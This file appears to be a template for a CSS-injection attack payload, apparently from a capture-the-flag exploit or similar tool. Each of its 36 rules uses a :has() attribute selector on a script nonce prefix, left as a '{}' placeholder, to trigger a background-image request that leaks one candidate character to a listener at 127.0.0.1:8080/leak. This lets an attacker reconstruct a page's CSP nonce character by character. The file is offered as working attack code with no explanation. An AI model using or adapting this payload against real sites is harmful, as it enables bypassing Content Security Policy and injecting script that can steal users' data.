html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=a)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=b)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=c)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=d)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=e)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=f)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=g)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=h)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=i)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=j)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=k)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=l)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=m)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=n)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=o)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=p)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=q)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=r)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=s)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=t)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=u)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=v)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=w)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=x)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=y)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=z)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=0)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=1)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=2)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=3)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=4)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=5)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=6)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=7)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=8)}
html:has(script[nonce^='{}']) {background: url(http://127.0.0.1:8080/leak?q=9)}
